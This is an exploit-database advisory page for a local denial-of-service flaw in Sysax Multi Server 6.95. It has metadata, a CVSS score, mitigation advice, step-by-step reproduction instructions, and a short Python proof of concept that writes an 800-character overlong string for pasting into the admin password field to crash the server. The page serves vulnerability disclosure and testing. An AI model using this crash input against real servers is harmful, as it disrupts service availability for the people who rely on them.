Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

vendor:

Sysax Multi Server

by:

Luis Martinez

7.5

CVSS

HIGH

Denial of Service (DoS) Local

400

CWE

Product Name: Sysax Multi Server

Affected Version From: 6.95

Affected Version To: 6.95

Patch Exists: NO

Related CWE:

CPE: sysax:multi_server:6.95

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64 es

2022

Sysax Multi Server 6.95 – ‘Password’ Denial of Service (PoC)

The vulnerability allows an attacker to cause a denial of service (DoS) condition on the Sysax Multi Server version 6.95. By providing a long string as the password, the application crashes. This can lead to a disruption in the availability of the server.

Mitigation:

Apply the latest patch or upgrade to a version that is not affected by this vulnerability. Restrict access to the server to trusted users only.

Source

Exploit-DB raw data:

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Clic "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 800
f = open ("Sysax_Multi_Server_6.95.txt", "w")
f.write(buffer)
f.close()